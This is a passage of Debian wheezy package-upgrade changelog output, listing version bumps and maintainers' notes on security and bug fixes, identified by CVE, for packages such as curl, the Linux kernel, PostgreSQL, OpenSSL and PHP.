php5-tidy 5.4.4-14+deb7u8 php5-xmlrpc 5.4.4-14+deb7u8 php5-xsl 5.4.4-14+deb7u8 php-pear 5.4.4-14+deb7u8 python2.7 2.7.3-6+deb7u2 python2.7-minimal 2.7.3-6+deb7u2 tzdata 2013i-0wheezy1 wget 1.13.4-3+deb7u1 whois 5.1.1~deb7u1 ======================================================================== Package Details: Reading changelogs... --- Changes for curl (curl libcurl3 libcurl3-gnutls) --- curl (7.26.0-1+wheezy8) wheezy-security; urgency=high * Fix re-use of wrong HTTP NTLM connection as per CVE-2014-0015 http://curl.haxx.se/docs/adv_20140129.html * Set urgency=high accordingly -- Alessandro Ghedini <ghedo@debian.org> Wed, 29 Jan 2014 19:01:03 +0100 curl (7.26.0-1+wheezy7) stable-security; urgency=high * Fix GnuTLS checking of a certificate CN or SAN name field when the digital signature verification is turned off as per CVE-2013-6422 http://curl.haxx.se/docs/adv_20131217.html * Set urgency=high accordingly -- Alessandro Ghedini <ghedo@debian.org> Wed, 11 Dec 2013 18:00:59 +0100 --- Changes for gnupg (gnupg gpgv) --- gnupg (1.4.12-7+deb7u3) wheezy-security; urgency=high * Fixed the RSA Key Extraction via Low-Bandwidth Acoustic Cryptanalysis attack as described by Genkin, Shamir, and Tromer. See <http://www.cs.tau.ac.il/~tromer/acoustic/>. [CVE-2013-4576] -- Thijs Kinkhorst <thijs@debian.org> Sat, 14 Dec 2013 09:18:28 +0100 --- Changes for gnutls26 (libgnutls26) --- gnutls26 (2.12.20-8+deb7u1) wheezy-security; urgency=high * 38_CVE-2014-0092.diff by Nikos Mavrogiannopoulos: Fix certificate validation issue. CVE-2014-0092 -- Andreas Metzler <ametzler@debian.org> Sat, 01 Mar 2014 07:44:51 +0100 gnutls26 (2.12.20-8) wheezy-security; urgency=high * 26_fix_rejection-of-v1-intermedi.diff pulled and unfuzzed from GIT 3.x: A version 1 intermediate certificate will be considered as a CA certificate by default (something that deviates from the documented behavior). CVE-2014-1959 / GNUTLS-SA-2014-1 -- Andreas Metzler <ametzler@debian.org> Sat, 15 Feb 2014 18:27:37 +0100 --- Changes for linux (linux-image-3.2.0-4-amd64 linux-libc-dev) --- linux (3.2.54-2) wheezy; urgency=high * [arm] Ignore ABI change in omap_dsp_get_mempool_base (fixes FTBFS) -- dann frazier <dannf@debian.org> Sat, 01 Feb 2014 13:08:46 +0000 linux (3.2.54-1) wheezy; urgency=high * New upstream stable update: http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.2.54 - NFSv4: Fix a use-after-free situation in _nfs4_proc_getlk() - USB: mos7840: fix tiocmget error handling - ALSA: 6fire: Fix probe of multiple cards - can: c_can: Fix RX message handling, handle lost message before EOB - dm mpath: fix race condition between multipath_dtr and pg_init_done - ext4: avoid bh leak in retry path of ext4_expand_extra_isize_ea() - KVM: IOMMU: hva align mapping page size - crypto: s390 - Fix aes-cbc IV corruption - audit: printk USER_AVC messages when audit isn't enabled - audit: fix info leak in AUDIT_GET requests - audit: use nlmsg_len() to get message payload length - PM / hibernate: Avoid overflow in hibernate_preallocate_memory() - blk-core: Fix memory corruption if blkcg_init_queue fails - block: fix a probe argument to blk_register_region - SUNRPC: Fix a data corruption issue when retransmitting RPC calls - mwifiex: correct packet length for packets from SDIO interface - vsprintf: check real user/group id for %pK - ipc, msg: fix message length check for negative values - hwmon: (lm90) Fix max6696 alarm handling - rtlwifi: rtl8192cu: Fix more pointer arithmetic errors - setfacl removes part of ACL when setting POSIX ACLs to Samba - nfsd: make sure to balance get/put_write_access - nfsd4: fix xdr decoding of large non-write compounds (regression in 3.2.49) - NFSv4 wait on recovery for async session errors - powerpc/signals: Mark VSX not saved with small contexts - iscsi-target: fix extract_param to handle buffer length corner case - iscsi-target: chap auth shouldn't match username with trailing garbage - configfs: fix race between dentry put and lookup - [powerpc] signals: Improved mark VSX not saved with small contexts fix - mac80211: don't attempt to reorder multicast frames - Staging: zram: Fix access of NULL pointer - Staging: zram: Fix memory leak by refcount mismatch - irq: Enable all irqs unconditionally in irq_resume - tracing: Allow events to have NULL strings - [armhf/omap] Staging: tidspbridge: disable driver - cpuset: Fix memory allocator deadlock - crypto: authenc - Find proper IV address in ablkcipher callback - crypto: scatterwalk - Set the chain pointer indication bit - [s390] crypto: s390 - Fix aes-xts parameter corruption - crypto: ccm - Fix handling of zero plaintext when computing mac - net: update consumers of MSG_MORE to recognize MSG_SENDPAGE_NOTLAST (fixes regression in 3.2.17) - hpsa: do not discard scsi status on aborted commands - hpsa: return 0 from driver probe function on success, not 1 - [arm] 7912/1: check stack pointer in get_wchan - [arm] 7913/1: fix framepointer check in unwind_frame - ALSA: memalloc.h - fix wrong truncation of dma_addr_t - dm snapshot: avoid snapshot space leak on crash - dm table: fail dm_table_create on dm_round_up overflow - hwmon: (w83l786ng) Fix fan speed control mode setting and reporting - hwmon: (w83l768ng) Fix fan speed control range - futex: fix handling of read-only-mapped hugepages - KVM: Improve create VCPU parameter (CVE-2013-4587) - [x86] KVM: Fix potential divide by 0 in lapic (CVE-2013-6367) - net: Fix "ip rule delete table 256" (Closes: #724783) - 6lowpan: Uncompression of traffic class field was incorrect - ipv4: fix possible seqlock deadlock - inet: prevent leakage of uninitialized memory to user in recv syscalls - net: rework recvmsg handler msg_name and msg_namelen logic - net: add BUG_ON if kernel advertises msg_namelen > sizeof(struct sockaddr_storage) - inet: fix addr_len/msg->msg_namelen assignment in recv_error and rxpmtu functions - ipv6: fix leaking uninitialized port number of offender sockaddr - net: core: Always propagate flag changes to interfaces - packet: fix use after free race in send path when dev is released - inet: fix possible seqlock deadlocks - ipv6: fix possible seqlock deadlock in ip6_finish_output2 - ftrace: Check module functions being traced on reload - ftrace: Fix function graph with loading of modules - mmc: block: fix a bug of error handling in MMC driver [ Ben Hutchings ] * SCSI: virtio_scsi: fix memory leak on full queue condition (Closes: #730138) * drm, agp: Update to 3.4.76: - drm/radeon: fix asic gfx values for scrapper asics - drm/edid: add quirk for BPC in Samsung NP700G7A-S01PL notebook - drm/radeon: fixup bad vram size on SI [ dann frazier ] * ath9k_htc: properly set MAC address and BSSID mask (CVE-2013-4579) * KVM: x86: Convert vapic synchronization to _cached functions (CVE-2013-6368) * x86, fpu, amd: Clear exceptions in AMD FXSAVE workaround (CVE-2014-1438) * hamradio/yam: fix info leak in ioctl (CVE-2014-1446) -- dann frazier <dannf@debian.org> Wed, 29 Jan 2014 13:42:01 -0700 linux (3.2.53-2) wheezy; urgency=high * [sparc] Ignore insignificant ABI changes (fixes FTBFS) * [powerpc] Update CPU device backport to work after 'powerpc/sysfs: Disable writing to PURR in guest mode' in 3.2.52 (fixes FTBFS) * exec/ptrace: Fix typo in backport of 'fix get_dumpable() incorrect tests' (CVE-2013-2929) (Closes: #732208) * net: Fix infinite loop in in skb_flow_dissect() (CVE-2013-4348) -- Ben Hutchings <ben@decadent.org.uk> Tue, 17 Dec 2013 03:24:07 +0000 linux (3.2.53-1) wheezy; urgency=medium * New upstream stable update: http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.2.52 - 8139cp: Add dma_mapping_error checking - ipv6: drop packets with multiple fragmentation headers - ipv6: Don't depend on per socket memory for neighbour discovery messages - HID: hidraw: correctly deallocate memory on device disconnect - xen-gnt: prevent adding duplicate gnt callbacks - usb: config->desc.bLength may not exceed amount of data returned by the device - USB: cdc-wdm: fix race between interrupt handler and tasklet - [powerpc] Handle unaligned ldbrx/stdbrx - intel-iommu: Fix leaks in pagetable freeing - ath9k: fix rx descriptor related race condition - ath9k: avoid accessing MRC registers on single-chain devices - rculist: list_first_or_null_rcu() should use list_entry_rcu() - USB: mos7720: fix big-endian control requests - of: Fix missing memory initialization on FDT unflattening - fuse: postpone end_page_writeback() in fuse_writepage_locked() - fuse: invalidate inode attributes on xattr modification - fuse: hotfix truncate_pagecache() issue - hdpvr: register the video node at the end of probe - hdpvr: fix iteration over uninitialized lists in hdpvr_probe() - fuse: readdir: check for slash in names - crypto: api - Fix race condition in larval lookup - sd: Fix potential out-of-bounds access - ocfs2: fix the end cluster offset of FIEMAP - mm/huge_memory.c: fix potential NULL pointer dereference - sched/fair: Fix small race where child->se.parent,cfs_rq might point to invalid ones - HID: zeroplus: validate output report details (CVE-2013-2889) - HID: LG: validate HID output report details (CVE-2013-2893) - HID: validate feature and input report details (CVE-2013-2897) - HID: logitech-dj: validate output report details (CVE-2013-2895) - nilfs2: fix issue with race condition of competition between segments for dirty blocks - powerpc: Fix parameter clobber in csum_partial_copy_generic() - powerpc: Restore registers on error exit from csum_partial_copy_generic() - net: sctp: fix smatch warning in sctp_send_asconf_del_ip - net: sctp: fix ipv6 ipsec encryption bug in sctp_v6_xmit (CVE-2013-4350) - ip: generate unique IP identificator if local fragmentation is allowed - ipv6: udp packets following an UFO enqueued packet need also be handled by UFO (CVE-2013-4387) - esp_scsi: Fix tag state corruption when autosensing. - [sparc] Fix not SRA'ed %o5 in 32-bit traced syscall - perf: Use css_tryget() to avoid propping up css refcount - Revert "zram: use zram->lock to protect zram_free_page() in swap free notify path" (regression in 3.2.49) - macvtap: do not zerocopy if iov needs more pages than MAX_SKB_FRAGS - sfc: Fix efx_rx_buf_offset() for recycled pages - cgroup: fail if monitored file and event_control are in different cgroup - perf: Fix perf_cgroup_switch for sw-events - Revert "sctp: fix call to SCTP_CMD_PROCESS_SACK in sctp_cmd_interpreter()" (regression in 3.2.34) - iscsi: don't hang in endless loop if no targets present - cpqarray: fix info leak in ida_locked_ioctl() (CVE-2013-2147) - cciss: fix info leak in cciss_ioctl32_passthru() (CVE-2013-2147) - staging: comedi: ni_65xx: (bug fix) confine insn_bits to one subdevice http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.2.53 - tcp: must unclone packets before mangling them - tcp: do not forget FIN in tcp_shifted_skb() (fixes regression in 2.6.39) - net: do not call sock_put() on TIMEWAIT sockets - net: heap overflow in __audit_sockaddr() - proc connector: fix info leaks - ipv6: restrict neighbor entry creation to output flow (fixes regression in 3.2.39) - farsync: fix info leak in ioctl - connector: use nlmsg_len() to check message length - wanxl: fix info leak in ioctl - net: unix: inherit SOCK_PASS{CRED, SEC} flags from socket to fix race (fixes regression in 3.2) - net: fix cipso packet validation when !NETLABEL - zram: allow request end to coincide with disksize - perf: Fix perf ring buffer memory ordering - inet: fix possible memory corruption with UDP_CORK and UFO (CVE-2013-4470) - tracing: Fix potential out-of-bounds in trace_get_user() - include/linux/fs.h: disable preempt when acquire i_size_seqcount write lock - jfs: fix error path in ialloc - random: run random_int_secret_init() run after all late_initcalls - mac80211: drop spoofed packets in ad-hoc mode - libata: make ata_eh_qc_retry() bump scmd->allowed on bogus failures - [powerpc] KVM: PPC: Book3S HV: Fix typo in saving DSCR - compiler/gcc4: Add quirk for 'asm goto' miscompilation bug - ext4: fix memory leak in xattr - [hppa] fix interruption handler to respect pagefault_disable() - dm snapshot: fix data corruption (CVE-2013-4299) - ecryptfs: Fix memory leakage in keystore.c - target/pscsi: fix return value check - Fix a few incorrectly checked [io_]remap_pfn_range() calls (CVE-2013-4511) - uml: check length in exitcode_proc_write() (CVE-2013-4512) - aacraid: missing capable() check in compat ioctl - staging: wlags49_h2: buffer overflow setting station name - Staging: bcm: info leak in ioctl - lib/scatterlist.c: don't flush_kernel_dcache_page on slab page * [armel/orion5x] i2c: mv64xxx: work around signals causing I2C transactions to be aborted * [armel/orion5x] I2C: mv64xxx: fix race between FSM/interrupt and process context (Closes: #622325) * aufs: Set version to 3.2.x-debian * drm: fix DRM_IOCTL_MODE_GETFB handle-leak * drm, agp: Update to 3.4.72: - drm/edid: add quirk for Medion MD30217PG - drm/ttm: fix the tt_populated check in ttm_tt_destroy() - drm/radeon: fix LCD record parsing - drm/radeon: fix endian bugs in hw i2c atom routines - drm/radeon: update line buffer allocation for dce4.1/5 - drm/radeon: update line buffer allocation for dce6 - drm/radeon: fix resume on some rs4xx boards (v2) - drm/radeon: fix handling of variable sized arrays for router objects - drm/radeon/atom: workaround vbios bug in transmitter table on rs880 (v2) - drm/i915/dp: increase i2c-over-aux retry interval on AUX DEFER - drm/radeon: disable tests/benchmarks if accel is disabled - drm/radeon: fix hw contexts for SUMO2 asics - drm: Prevent overwriting from userspace underallocating core ioctl structs - drm/radeon/atom: workaround vbios bug in transmitter table on rs780 - drm/ttm: Handle in-memory region copies - drm/i915: flush cursors harder - drm/nouveau: when bailing out of a pushbuf ioctl, do not remove previous fence - drm/radeon/si: fix define for MC_SEQ_TRAIN_WAKEUP_CNTL - radeon: workaround pinning failure on low ram gpu * [rt] Update to 3.2.53-rt75: - genirq: Set the irq thread policy without checking CAP_SYS_NICE - hwlat-detector: Don't ignore threshold module - mm/memcontrol: Don't call schedule_work_on in preemption disabled context - drm: remove preempt_disable() from drm_calc_vbltimestamp_from_scanoutpos() * net: clamp ->msg_namelen instead of returning an error (fixes regression in 3.2.53) * rds: prevent BUG_ON triggered on congestion update to loopback (CVE-2012-2372) * HID: multitouch: validate indexes details (CVE-2013-2897) * exec/ptrace: fix get_dumpable() incorrect tests (CVE-2013-2929) * crypto: ansi_cprng - Fix off by one error in non-block size request (CVE-2013-4345) * KVM: perform an invalid memslot step for gpa base change * KVM: Fix iommu map/unmap to handle memory slot moves (CVE-2013-4592) * [armhf] 7527/1: uaccess: explicitly check __user pointer when !CPU_USE_DOMAINS (CVE-2013-6282) * libertas: potential oops in debugfs (CVE-2013-6378) * aacraid: prevent invalid pointer dereference (CVE-2013-6380) * [s390,s390x] qeth: avoid buffer overflow in snmp ioctl (CVE-2013-6381) * xfs: underflow bug in xfs_attrlist_by_handle() (CVE-2013-6382) -- Ben Hutchings <ben@decadent.org.uk> Fri, 06 Dec 2013 07:23:56 +0000 --- Changes for memcached --- memcached (1.4.13-0.2+deb7u1) wheezy-security; urgency=high * Non-maintainer upload by the Security Team. * Add 06_CVE-2011-4971.patch patch. CVE-2011-4971: Fix remote denial of service. Sending a specially crafted packet cause memcached to segfault. (Closes: #706426) * Add 07_CVE-2013-7239.patch patch. CVE-2013-7239: SASL authentication allows wrong credentials to access memcache. (Closes: #733643) -- Salvatore Bonaccorso <carnil@debian.org> Mon, 30 Dec 2013 17:47:44 +0100 --- Changes for mutt --- mutt (1.5.21-6.2+deb7u2) wheezy-security; urgency=high * Non-maintainer upload. * Fix buffer overrun caused by not updating a string length after address expansion. Fixes: CVE-2014-0467 Closes: #708731 -- Evgeni Golov <evgeni@debian.org> Tue, 11 Mar 2014 18:31:30 +0100 --- Changes for postgresql-9.1 (libpq5 libpq-dev) --- postgresql-9.1 (9.1.12-0wheezy1) wheezy-security; urgency=high * New upstream security/bugfix release. + Shore up GRANT ... WITH ADMIN OPTION restrictions (Noah Misch) Granting a role without ADMIN OPTION is supposed to prevent the grantee from adding or removing members from the granted role, but this restriction was easily bypassed by doing SET ROLE first. The security impact is mostly that a role member can revoke the access of others, contrary to the wishes of his grantor. Unapproved role member additions are a lesser concern, since an uncooperative role member could provide most of his rights to others anyway by creating views or SECURITY DEFINER functions. (CVE-2014-0060) + Prevent privilege escalation via manual calls to PL validator functions (Andres Freund) The primary role of PL validator functions is to be called implicitly during CREATE FUNCTION, but they are also normal SQL functions that a user can call explicitly. Calling a validator on a function actually written in some other language was not checked for and could be exploited for privilege-escalation purposes. The fix involves adding a call to a privilege-checking function in each validator function. Non-core procedural languages will also need to make this change to their own validator functions, if any. (CVE-2014-0061) + Avoid multiple name lookups during table and index DDL (Robert Haas, Andres Freund) If the name lookups come to different conclusions due to concurrent activity, we might perform some parts of the DDL on a different table than other parts. At least in the case of CREATE INDEX, this can be used to cause the permissions checks to be performed against a different table than the index creation, allowing for a privilege escalation attack. (CVE-2014-0062) + Prevent buffer overrun with long datetime strings (Noah Misch) The MAXDATELEN constant was too small for the longest possible value of type interval, allowing a buffer overrun in interval_out(). Although the datetime input functions were more careful about avoiding buffer overrun, the limit was short enough to cause them to reject some valid inputs, such as input containing a very long timezone name. The ecpg library contained these vulnerabilities along with some of its own. (CVE-2014-0063) + Prevent buffer overrun due to integer overflow in size calculations (Noah Misch, Heikki Linnakangas) Several functions, mostly type input functions, calculated an allocation size without checking for overflow. If overflow did occur, a too-small buffer would be allocated and then written past. (CVE-2014-0064) + Prevent overruns of fixed-size buffers (Peter Eisentraut, Jozef Mlich) Use strlcpy() and related functions to provide a clear guarantee that fixed-size buffers are not overrun. Unlike the preceding items, it is unclear whether these cases really represent live issues, since in most cases there appear to be previous constraints on the size of the input string. Nonetheless it seems prudent to silence all Coverity warnings of this type. (CVE-2014-0065) + Avoid crashing if crypt() returns NULL (Honza Horak, Bruce Momjian) There are relatively few scenarios in which crypt() could return NULL, but contrib/chkpass would crash if it did. One practical case in which this could be an issue is if libc is configured to refuse to execute unapproved hashing algorithms (e.g., "FIPS mode"). (CVE-2014-0066) + Document risks of make check in the regression testing instructions (Noah Misch, Tom Lane) Since the temporary server started by make check uses "trust" authentication, another user on the same machine could connect to it as database superuser, and then potentially exploit the privileges of the operating-system user who started the tests. A future release will probably incorporate changes in the testing procedure to prevent this risk, but some public discussion is needed first. So for the moment, just warn people against using make check when there are untrusted users on the same machine. (CVE-2014-0067) * The upstream tarballs no longer contain a plain HISTORY file, but point to the html documentation. Note the location of these files in our changelog.gz file. -- Christoph Berg <christoph.berg@credativ.de> Thu, 20 Feb 2014 13:34:54 +0100 postgresql-9.1 (9.1.11-0wheezy1) stable; urgency=low * New upstream bug fix release: - Fix "VACUUM"'s tests to see whether it can update relfrozenxid In some cases "VACUUM" (either manual or autovacuum) could incorrectly advance a table's relfrozenxid value, allowing tuples to escape freezing, causing those rows to become invisible once 2^31 transactions have elapsed. The probability of data loss is fairly low since multiple incorrect advancements would need to happen before actual loss occurs, but it's not zero. Users upgrading from releases 9.0.4 or 8.4.8 or earlier are not affected, but all later versions contain the bug. The issue can be ameliorated by, after upgrading, vacuuming all tables in all databases while having vacuum_freeze_table_age set to zero. This will fix any latent corruption but will not be able to fix all pre-existing data errors. However, an installation can be presumed safe after performing this vacuuming if it has executed fewer than 2^31 update transactions in its lifetime (check this with SELECT txid_current() < 2^31). - Fix initialization of "pg_clog" and "pg_subtrans" during hot standby startup This bug can cause data loss on standby servers at the moment they start to accept hot-standby queries, by marking committed transactions as uncommitted. The likelihood of such corruption is small unless, at the time of standby startup, the primary server has executed many updating transactions since its last checkpoint. Symptoms include missing rows, rows that should have been deleted being still visible, and obsolete versions of updated rows being still visible alongside their newer versions. This bug was introduced in versions 9.3.0, 9.2.5, 9.1.10, and 9.0.14. Standby servers that have only been running earlier releases are not at risk. It's recommended that standby servers that have ever run any of the buggy releases be re-cloned from the primary (e.g., with a new base backup) after upgrading. - See HISTORY/changelog.gz for details about other bug fixes. -- Martin Pitt <mpitt@debian.org> Thu, 05 Dec 2013 06:28:57 +0100 postgresql-9.1 (9.1.10-0wheezy1) stable; urgency=low * New upstream bug fix release. See HISTORY/changelog.gz for details. (No security or critical issues this time.) -- Martin Pitt <mpitt@debian.org> Tue, 15 Oct 2013 11:49:53 +0200 --- Changes for apache2 (apache2.2-bin apache2.2-common apache2-mpm-prefork apache2-prefork-dev apache2-utils) --- apache2 (2.2.22-13+deb7u1) wheezy; urgency=medium Low impact security fixes: * CVE-2013-1862: mod_rewrite: Ensure that client data written to the RewriteLog is escaped to prevent terminal escape sequences from entering the log file. Closes: #722333 * CVE-2013-1896: mod_dav: denial of service via MERGE request. Closes: #717272 * mod_dav: Fix segfaults in certain error conditions. https://issues.apache.org/bugzilla/show_bug.cgi?id=52559 * Make apache2ctl create the necessary directories even if started with special options for apache2. Closes: #731531 * Adjust paragraph in README.Debian about MaxMemFree not working properly. The issue has been fixed with apr 1.4.5-1. -- Stefan Fritsch <sf@debian.org> Fri, 31 Jan 2014 19:43:07 +0100 --- Changes for openssl (libssl-doc openssl) --- openssl (1.0.1e-2+deb7u4) stable; urgency=medium * enable ec_nistp_64_gcc_128 on *-amd64 (Closes: #698447) * Enable assembler for the arm targets, and remove armeb. Patch by Riku Voipio <riku.voipio@iki.fi> (Closes: #676533) -- Kurt Roeckx <kurt@roeckx.be> Sat, 01 Feb 2014 21:25:20 +0100 openssl (1.0.1e-2+deb7u3) stable-security; urgency=medium * Don't change version number if session established -- Kurt Roeckx <kurt@roeckx.be> Mon, 06 Jan 2014 20:28:20 +0100 openssl (1.0.1e-2+deb7u2) stable-security; urgency=medium * The patch we applied for CVE-2013-6450 was causing segfaults, also apply the previous commit checking for NULL in EVP_MD_CTX_destroy() * Fix for TLS record tampering bug CVE-2013-4353 -- Kurt Roeckx <kurt@roeckx.be> Mon, 06 Jan 2014 18:17:13 +0100 openssl (1.0.1e-2+deb7u1) stable-security; urgency=medium * Fix CVE-2013-6449 (Closes: #732754) * Fix CVE-2013-6450 * disable rdrand by default. It was used as only source of entropy when available. (Closes: #732710) * Disable Dual EC DRBG. -- Kurt Roeckx <kurt@roeckx.be> Mon, 23 Dec 2013 17:47:19 +0100 --- Changes for whois --- whois (5.1.1~deb7u1) proposed-updates; urgency=low * Rebuilt for wheezy. -- Marco d'Itri <md@linux.it> Sat, 11 Jan 2014 03:16:43 +0100 whois (5.1.1) unstable; urgency=medium * Added the servers for 29 "new" gTLDs. -- Marco d'Itri <md@linux.it> Sat, 11 Jan 2014 00:51:05 +0100 whois (5.1.0) unstable; urgency=low * Added the .ga, .ml, .pf, .xn--l1acc (.???, Mongolia) and .xn--mgba3a4f16a (.?????, Iran) TLD servers. * Added the servers for 54 "new" gTLDs. * Updated the .bw, .gd, .hn, .sb, .xn--j1amh and .xn--mgberp4a5d4ar TLD servers. * Added new RIPE and APNIC ASN allocations. * Removed the .ck TLD server. * Updated one or more translations. * Applied multiple small fixes contributed by Petr Písa? of Red Hat. * Correctly hide the disclaimers for .be and .sx. (Closes: #729366) * Direct queries for private ASN blocks to RIPE. (Closes: #724661) -- Marco d'Itri <md@linux.it> Thu, 26 Dec 2013 10:05:43 +0100 whois (5.0.26) unstable; urgency=low * Added the .cf TLD server. * Updated the .bi TLD server. * Added a new ASN allocation. -- Marco d'Itri <md@linux.it> Wed, 17 Jul 2013 00:48:12 +0200 whois (5.0.25) unstable; urgency=low * Added the .ax, .bn, .iq, .pw and .rw TLD servers. * Updated one or more translations. -- Marco d'Itri <md@linux.it> Fri, 10 May 2013 05:13:47 +0200 whois (5.0.24) unstable; urgency=low * Merged documentation fixes and the whois.conf(5) man page, courtesy of Petr Písa? of Red Hat. * Added a new ASN allocation. * Updated one or more translations. (Closes: #705163) -- Marco d'Itri <md@linux.it> Thu, 18 Apr 2013 03:36:17 +0200 --- Changes for apt (apt apt-utils libapt-inst1.5 libapt-pkg4.12) --- apt (0.9.7.9+deb7u1) wheezy; urgency=low * Non-maintainer upload. * Apply patch for large .debs (Closes: #725483) Thanks Mark Hymers for the patch, Vincent Sanders for the review * Apply patch for strict multi-arch checking in single-architecture environments (Closes: #723586) -- Jonathan Wiltshire <jmw@debian.org> Sat, 16 Nov 2013 11:14:39 +0000 --- Changes for base-files --- base-files (7.1wheezy4) stable; urgency=low * Changed /etc/debian_version to 7.4, for Debian 7.4 point release. -- Santiago Vila <sanvila@debian.org> Tue, 28 Jan 2014 11:49:40 +0100 base-files (7.1wheezy3) stable; urgency=low * Changed /etc/debian_version to 7.3, for Debian 7.3 point release. -- Santiago Vila <sanvila@debian.org> Wed, 04 Dec 2013 12:30:04 +0100 --- Changes for dropbox --- dropbox (1.6.1) stable; urgency=low * Initial Release, This package doesn't use a changelog -- Rian Hunter <rian@dropbox.com> Wed, 18 Dec 2013 09:08:46 -0800 --- Changes for eglibc (libc6 libc6-dev libc-bin libc-dev-bin locales multiarch-support) --- eglibc (2.13-38+deb7u1) wheezy; urgency=low [ Aurelien Jarno ] * debian/testsuite-checking/compare.sh: disable failing the build on test regressions to ease the pain of ongoing stable/security maintenance. * patches/any/cvs-CVE-2012-44xx.diff: backport overflow fixes in strcoll, addressing CVE-2012-4412 and CVE-2012-4424 (Closes: #687530, #689423). * patches/any/CVE-2013-0242.diff: backport buffer overrun fix in regexp matcher, addressing CVE-2013-0242 (Closes: #699399). * patches/cvs-CVE-2013-1914.diff: backport stack overflow fixes in getaddrinfo(), addressing CVE-2013-1914 (Closes: #704623). * patches/any/cvs-CVE-2013-4237.diff: backport buffer overwrite fix in readdir_r for file systems returning file names longer than NAME_MAX characters, addressing CVE-2013-4237 (Closes: #719558). patches/kfreebsd/local-readdir_r.diff: remove superseded by the CVE patch. * patches/any/cvs-CVE-2013-4332.diff: backport integer overflow fixes in pvalloc, valloc, posix_memalign, memalign and aligned_alloc functions, addressing CVE-2013-4332 (Closes: #722536). * patches/any/cvs-CVE-2013-4458.diff: backport stack (frame) overflow fixes in getaddrinfo() when called with AF_INET6, addressing CVE-2013-4458 (Closes: #727181). * patches/any/cvs-CVE-2013-4788.diff: backport patch to fix PTR_MANGLE ineffectivity for statically linked binaries, addressing CVE-2013-4788 (Closes: #717178). *** Note that static binaries need to be recompiled to take advantage of the fix ***. * patches/any/cvs-findlocale-div-by-zero.diff: patch from upstream to fix a SIGFPE when locale-archive has been corrupted to all zeros (Closes: #718890, #730336). * patches/mips/cvs-prlimit64.diff: patch from upstream to fix getrlimit64 and setrlimit64 with recent 64-bit kernels (Closes: #665897). [ Petr Salinger ] * patches/kfreebsd/local-initgroups-order.diff: always put supplied extra gid as the first entry of group list in setgroups(). Closes: #699593. * inline is not keyword in c89 mode, use __inline. Closes: #704598. * sys_ktimer_settime have 4 parameters. Closes: #712196. -- Aurelien Jarno <aurel32@debian.org> Thu, 05 Dec 2013 23:19:48 +0100 --- Changes for expat (libexpat1 libexpat1-dev) --- expat (2.1.0-1+deb7u1) wheezy; urgency=low [ Matthias Klose ] * Don't ship the pkgconfig file in lib64expat1-dev. Closes: #706932. [ Laszlo Boszormenyi (GCS) ] * New maintainer (closes: #660681). -- Andreas Beckmann <anbe@debian.org> Thu, 05 Dec 2013 12:39:53 +0100 --- Changes for libapache2-mod-rpaf --- libapache2-mod-rpaf (0.6-7+wheezy1) stable; urgency=low * Restore 030_ipv6.patch, removed by QA upload in 0.6-1 (Closes: #726529) -- Sergey B Kirpichev <skirpichev@gmail.com> Mon, 20 Jan 2014 17:56:07 +0400 --- Changes for libav (libavcodec53 libavformat53 libavutil51 libswscale2) --- libav (6:0.8.10-1) stable-security; urgency=low * Imported Upstream version 0.8.9, new releases fixes: - CVE-2013-0855, CVE-2013-0856, CVE-2013-0865, CVE-2013-4358, CVE-2013-7010, CVE-2013-7014 * Too many security related upstream changes to list here, please cf. to upstream changelog: http://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v0.8.9 -- Reinhard Tartler <siretart@tauware.de> Tue, 04 Feb 2014 20:09:57 -0500 --- Changes for libnet-server-perl --- libnet-server-perl (2.006-1+deb7u1) wheezy; urgency=low * Team upload. * Add fix-use-of-uninitialized-value-in-pattern-match.patch. Fixes use of uninitialized value in pattern match. This in particular affects munin-nodes under wheezy. Logs are spammed with entries: "Use of uninitialized value in pattern match (m//) at /usr/share/perl5/Net/Server.pm line 600.". (Closes: #693320) -- Salvatore Bonaccorso <carnil@debian.org> Thu, 28 Nov 2013 12:31:37 +0100 --- Changes for librsvg (librsvg2-2 librsvg2-common) --- librsvg (2.36.1-2) stable; urgency=low [ Raphaël Geissert ] * Fix CVE-2013-1881: disable loading of external entities. Closes: #724741. [ Josselin Mouette ] * Break libgtk-3-0 (<< 3.4.2-7) which uses the anti-feature that is disabled by the security fix. -- Josselin Mouette <joss@debian.org> Wed, 04 Dec 2013 21:08:25 +0100 --- Changes for percona-server-5.5 (libmysqlclient18 percona-server-client-5.5 percona-server-common-5.5 percona-server-server-5.5) --- percona-server-5.5 (5.5.36-rel34.2-648.wheezy) wheezy; urgency=low * Update distribution -- Jenkins User <jenkins@debian> Mon, 24 Mar 2014 12:09:43 -0400 percona-server-5.5 (5.5.36-34.2-1) unstable; urgency=low * Update to new upstream release Percona Server 5.5.36-34.2 -- Jenkins User <jenkins@debian> Mon, 24 Mar 2014 12:03:33 -0400 --- Changes for percona-xtradb-cluster-5.6 (libmysqlclient18.1 libmysqlclient-dev) --- percona-xtradb-cluster-5.6 (5.6.15-25.5-759.wheezy) wheezy; urgency=low * Update distribution -- Raghavendra Prabhu <raghavendra.prabhu@percona.com> Thu, 20 Mar 2014 06:39:36 -0400 percona-xtradb-cluster-5.6 (5.6.15-rel62.0) unstable; urgency=low * Release bump. -- Raghavendra Prabhu <raghavendra.prabhu@percona.com> Thu, 30 Jan 2014 17:00:00 -0300 percona-xtradb-cluster-5.6 (5.6.15-rel62.0) unstable; urgency=low * Updated to 5.6.15. -- Raghavendra Prabhu <raghavendra.prabhu@percona.com> Wed, 14 Dec 2013 17:00:00 -0300 --- Changes for php5 (libapache2-mod-php5 php5 php5-cli php5-common php5-curl php5-dev php5-fpm php5-gd php5-intl php5-mcrypt php5-mysql php5-sqlite php5-sybase php5-tidy php5-xmlrpc php5-xsl php-pear) --- php5 (5.4.4-14+deb7u8) wheezy-security; urgency=low * [CVE-2014-1943]: Fix segmentation fault in libmagic (Closes: #739012) -- Ond?ej Surý <ondrej@debian.org> Mon, 17 Feb 2014 10:07:18 +0100 php5 (5.4.4-14+deb7u7) wheezy-security; urgency=low * [CVE-2013-6420]: Fix memory corruption in openssl_x509_parse (Closes: #731895) * [CVE-2013-6712]: Fix heap buffer over-read in DateInterval (Closes: #731112) -- Ond?ej Surý <ondrej@debian.org> Thu, 12 Dec 2013 09:28:14 +0100 php5 (5.4.4-14+deb7u6) stable; urgency=low [ William Dauchy ] * upstream fix: curl memory leak (Closes: #725868) * upstream fix: allow root to run php-fpm (Closes: #725890) * upstream fix: remove annoying warnings with php-fpm and user usage (Closes: #725972) * upstream 